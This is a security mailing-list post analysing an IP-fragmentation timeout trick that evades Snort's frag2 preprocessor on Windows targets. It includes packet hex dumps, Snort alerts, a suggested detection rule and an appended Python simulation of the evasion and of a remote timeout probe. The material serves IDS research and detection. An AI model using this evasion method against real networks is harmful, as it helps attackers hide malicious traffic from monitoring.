<pre>
There seems to be some confusion about the fragmentation IDS evasion. We've
observed fragmentation timeouts on Windows from 5 seconds to 90 seconds,
depending on the software installed and random chance. Here are raw dumps from
an evasion.

The mistake Judy Novak made in her analysis was in not recalculating the delay
between the first fragment and the other two fragments. If it is too short, the
target will reassemble the first two fragments, find an invalid checksum, and
discard the packet. No ICMP response will be sent. Some experimentation will
have to be done to find the correct timeout. It can be done remotely by
increasing the time between two good fragments until a reply isn't sent.
(Windows boxes don't seem to send out a frag time exceeded on anything other
than the first fragment.)

Here's a packet dump to verify that Snort's frag2 preprocessor is working:

16:04:18.155735 IP (tos 0x0, ttl 64, id 15537, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 3cb1 2000 4001 0054 0a04 04d9 0a04  ..<...@..T......
        0x0020:  04fc 0800 5446 8236 0053 5555 5555 5555  ....TF.6.SUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU
16:04:18.178271 IP (tos 0x0, ttl 64, id 15537, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 3cb1 0001 4001 2053 0a04 04d9 0a04  ..<...@..S......
        0x0020:  04fc 4241 4453 5455 4646 5555 5555 5555  ..BADSTUFFUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU
16:04:18.178325 IP (tos 0x0, ttl 128, id 57573, offset 0, flags [none], proto: ICMP (1), length: 36) 10.4.4.252 > 10.4.4.217: ICMP echo reply, id 33334, seq 83, length 16
        0x0000:  000d 93b4 d31a 0011 2f7e db0b 0800 4500  ......../~....E.
        0x0010:  0024 e0e5 0000 8001 3c17 0a04 04fc 0a04  .$......<.......
        0x0020:  04d9 0000 5c46 8236 0053 4241 4453 5455  ....\F.6.SBADSTU
        0x0030:  4646 0000 0000 0000 0000 0000            FF..........

[**] [1:384:5] Found BadStuff [**]
[Classification: Misc activity] [Priority: 3]
02/02-16:04:18.178271 10.4.4.217 -> 10.4.4.252
ICMP TTL:64 TOS:0x0 ID:15537 IpLen:20 DgmLen:36
Type:8  Code:0  ID:33334   Seq:83  ECHO

[**] [1:384:5] Found Generic ICMP Packet [**]
[Classification: Misc activity] [Priority: 3]
02/02-16:04:18.178271 10.4.4.217 -> 10.4.4.252
ICMP TTL:64 TOS:0x0 ID:15537 IpLen:20 DgmLen:36
Type:8  Code:0  ID:33334   Seq:83  ECHO

With no delay, Snort properly reassembles the fragments and generates an
alert. With a delay, the target doesn't reassemble, but Snort still generates
an alert.

16:01:33.951416 IP (tos 0x0, ttl 64, id 12524, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 30ec 2000 4001 0c19 0a04 04d9 0a04  ..0...@.........
        0x0020:  04fc 0800 5446 8236 0053 5555 5555 5555  ....TF.6.SUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU
16:02:38.281468 IP (tos 0x0, ttl 128, id 57570, offset 0, flags [none], proto: ICMP (1), length: 56) 10.4.4.252 > 10.4.4.217: ICMP ip reassembly time exceeded, length 36
        IP (tos 0x0, ttl 64, id 12524, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8
        0x0000:  000d 93b4 d31a 0011 2f7e db0b 0800 4500  ......../~....E.
        0x0010:  0038 e0e2 0000 8001 3c06 0a04 04fc 0a04  .8......<.......
        0x0020:  04d9 0b01 162f 0000 0000 4500 001c 30ec  ...../....E...0.
        0x0030:  2000 4001 0c19 0a04 04d9 0a04 04fc 0800  ..@.............
        0x0040:  5446 8236 0053                           TF.6.S
16:03:04.977353 IP (tos 0x0, ttl 64, id 12524, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 30ec 0001 4001 2c18 0a04 04d9 0a04  ..0...@.,.......
        0x0020:  04fc 4241 4453 5455 4646 5555 5555 5555  ..BADSTUFFUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU

[**] [1:384:5] Found BadStuff [**]
[Classification: Misc activity] [Priority: 3]
02/02-16:03:04.977353 10.4.4.217 -> 10.4.4.252
ICMP TTL:64 TOS:0x0 ID:12524 IpLen:20 DgmLen:36
Type:8  Code:0  ID:33334   Seq:83  ECHO

[**] [1:384:5] Found Generic ICMP Packet [**]
[Classification: Misc activity] [Priority: 3]
02/02-16:03:04.977353 10.4.4.217 -> 10.4.4.252
ICMP TTL:64 TOS:0x0 ID:12524 IpLen:20 DgmLen:36
Type:8  Code:0  ID:33334   Seq:83  ECHO

With a delay of 91 seconds, the IDS evasion works and we get back a properly
reassembled ICMP reply.

15:57:17.846828 IP (tos 0x0, ttl 64, id 12603, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 313b 0001 4001 2bc9 0a04 04d9 0a04  ..1;..@.+.......
        0x0020:  04fc 474f 4453 5455 4646 5555 5555 5555  ..GODSTUFFUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU
15:58:48.873073 IP (tos 0x0, ttl 64, id 12603, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 313b 2000 4001 0bca 0a04 04d9 0a04  ..1;..@.........
        0x0020:  04fc 0800 5446 8236 0053 5555 5555 5555  ....TF.6.SUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU
15:58:48.892586 IP (tos 0x0, ttl 64, id 12603, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp
        0x0000:  0011 2f7e db0b 000d 93b4 d31a 0800 4500  ../~..........E.
        0x0010:  001c 313b 0001 4001 2bc9 0a04 04d9 0a04  ..1;..@.+.......
        0x0020:  04fc 4241 4453 5455 4646 5555 5555 5555  ..BADSTUFFUUUUUU
        0x0030:  5555 5555 5555 5555 5555 5555            UUUUUUUUUUUU
15:58:48.892644 IP (tos 0x0, ttl 128, id 57559, offset 0, flags [none], proto: ICMP (1), length: 36) 10.4.4.252 > 10.4.4.217: ICMP echo reply, id 33334, seq 83, length 16
        0x0000:  000d 93b4 d31a 0011 2f7e db0b 0800 4500  ......../~....E.
        0x0010:  0024 e0d7 0000 8001 3c25 0a04 04fc 0a04  .$......<%......
        0x0020:  04d9 0000 5c46 8236 0053 4241 4453 5455  ....\F.6.SBADSTU
        0x0030:  4646 0000 0000 0000 0000 0000            FF..........

There were no Snort alerts.

We haven't tried frag3, but fragments generally aren't delayed in the wild, so
an alert on all fragments more than a second apart would probably be effective.

Jason Larsen
Mike Milvich
</pre>
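The four timelines the post describes (no delay, a 91-second gap, the decoy-first evasion, and the too-short gap that makes the target assemble the decoy under a checksum computed for the real data) modelled in Python. This is an added example, not code from the original post or from Snort. Its assumptions: a target reassembly timeout of 64 seconds (roughly the gap before the "ip reassembly time exceeded" in the second dump), an IDS timeout of 120 seconds (the dumps only show that Snort's exceeded 91 seconds), first-fragment-wins when the same offset is queued twice, and a `probe_timeout` helper that carries out the remote timing probe the post suggests by widening the gap between two good fragments. The checksum routine is the standard RFC 1071 one and reproduces the 0x5446 request and 0x5c46 reply values in the dumps.

```python
"""Model of the fragment-timeout IDS evasion in the dumps above (added example)."""
from dataclasses import dataclass

TARGET_TIMEOUT = 64.0   # seconds; assumed from the time-exceeded gap in the second dump
IDS_TIMEOUT = 120.0     # seconds; assumed, the dumps only show it is longer than 91 s


def icmp_checksum(msg: bytes) -> int:
    """RFC 1071 one's-complement checksum over ICMP header + data."""
    if len(msg) % 2:
        msg += b"\x00"
    total = sum(int.from_bytes(msg[i:i + 2], "big") for i in range(0, len(msg), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def checksum_ok(msg: bytes) -> bool:
    """With the checksum field filled in, a correct message checksums to zero."""
    return icmp_checksum(msg) == 0


def echo_request(ident: int, seq: int, data: bytes) -> bytes:
    """ICMP echo request (type 8, code 0) with the checksum filled in."""
    hdr = bytes([8, 0, 0, 0]) + ident.to_bytes(2, "big") + seq.to_bytes(2, "big")
    csum = icmp_checksum(hdr + data).to_bytes(2, "big")
    return hdr[:2] + csum + hdr[4:] + data


@dataclass
class Frag:
    ip_id: int
    offset: int   # byte offset into the datagram (multiple of 8)
    mf: bool      # More Fragments flag
    data: bytes


def fragments(data: bytes, ip_id: int):
    """Split an echo request the way the dumps do: 8-byte ICMP header, then the data."""
    msg = echo_request(0x8236, 0x53, data)
    return Frag(ip_id, 0, True, msg[:8]), Frag(ip_id, 8, False, msg[8:])


class Reassembler:
    """Per-datagram queue with a timeout counted from the first fragment seen."""

    def __init__(self, timeout: float):
        self.timeout = timeout
        self.queues = {}  # ip_id -> [first_seen, {offset: Frag}]

    def receive(self, t: float, frag: Frag):
        """Queue a fragment seen at time t; return the datagram once complete, else None."""
        for ip_id in [k for k, (t0, _) in self.queues.items() if t - t0 >= self.timeout]:
            del self.queues[ip_id]           # a Windows host sends ICMP time exceeded here
        _, frags = self.queues.setdefault(frag.ip_id, [t, {}])
        frags.setdefault(frag.offset, frag)  # repeated offset: first fragment wins (assumed)
        data, pos = b"", 0
        while pos in frags:                  # walk contiguous coverage from offset 0
            data += frags[pos].data
            if not frags[pos].mf:
                del self.queues[frag.ip_id]
                return data
            pos += len(frags[pos].data)
        return None


def target_reply(events):
    """Replay (time, Frag) events into the host model. Returns the echoed data if a
    datagram with a valid ICMP checksum is assembled, else None (silent drop)."""
    host = Reassembler(TARGET_TIMEOUT)
    for t, frag in events:
        msg = host.receive(t, frag)
        if msg is not None and checksum_ok(msg):
            return msg[8:]
    return None


def ids_alerts(events, pattern: bytes = b"BADSTUFF") -> bool:
    """Replay the same events into the IDS model with a content rule on the datagram."""
    ids = Reassembler(IDS_TIMEOUT)
    for t, frag in events:
        msg = ids.receive(t, frag)
        if msg is not None and pattern in msg:
            return True
    return False


def run(events):
    """(reply data or None, IDS alerted?) for one timeline."""
    return target_reply(events), ids_alerts(events)


HDR, BAD = fragments(b"BADSTUFF", 12603)   # HDR carries the checksum for BADSTUFF
_, DECOY = fragments(b"GODSTUFF", 12603)   # only the data fragment of the decoy is sent

SCENARIOS = {  # constructed timelines, seconds relative to the first fragment
    "no delay":      [(0.0, HDR), (0.02, BAD)],                  # reply, alert
    "91 s gap":      [(0.0, HDR), (91.0, BAD)],                  # no reply, alert
    "evasion":       [(0.0, DECOY), (91.0, HDR), (91.02, BAD)],  # reply, no alert
    "gap too short": [(0.0, DECOY), (30.0, HDR), (30.02, BAD)],  # target gets GODSTUFF: bad checksum
}


def probe_timeout(lo: int = 1, hi: int = 120) -> int:
    """Find the target timeout remotely as the post suggests: widen the gap between two
    good fragments until the reply stops (binary search over whole seconds; hi gets no reply)."""
    hdr, tail = fragments(b"PROBEPKT", 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if target_reply([(0.0, hdr), (float(mid), tail)]) is None:
            hi = mid
        else:
            lo = mid + 1
    return lo


if __name__ == "__main__":
    for name, events in SCENARIOS.items():
        reply, alert = run(events)
        print(f"{name:14s} reply={reply!r} alert={alert}")
    print("target timeout found:", probe_timeout())
```

Running the module prints one line per scenario: the evasion timeline returns BADSTUFF to the sender with no alert, while the too-short timeline returns nothing because the target assembled GODSTUFF under the BADSTUFF checksum, exactly the failure the post attributes to the earlier analysis. The model deliberately gives the IDS only a content rule; a real Snort with its default checksum verification would also discard the GODSTUFF datagram, so the lack of an alert in that case is over-determined.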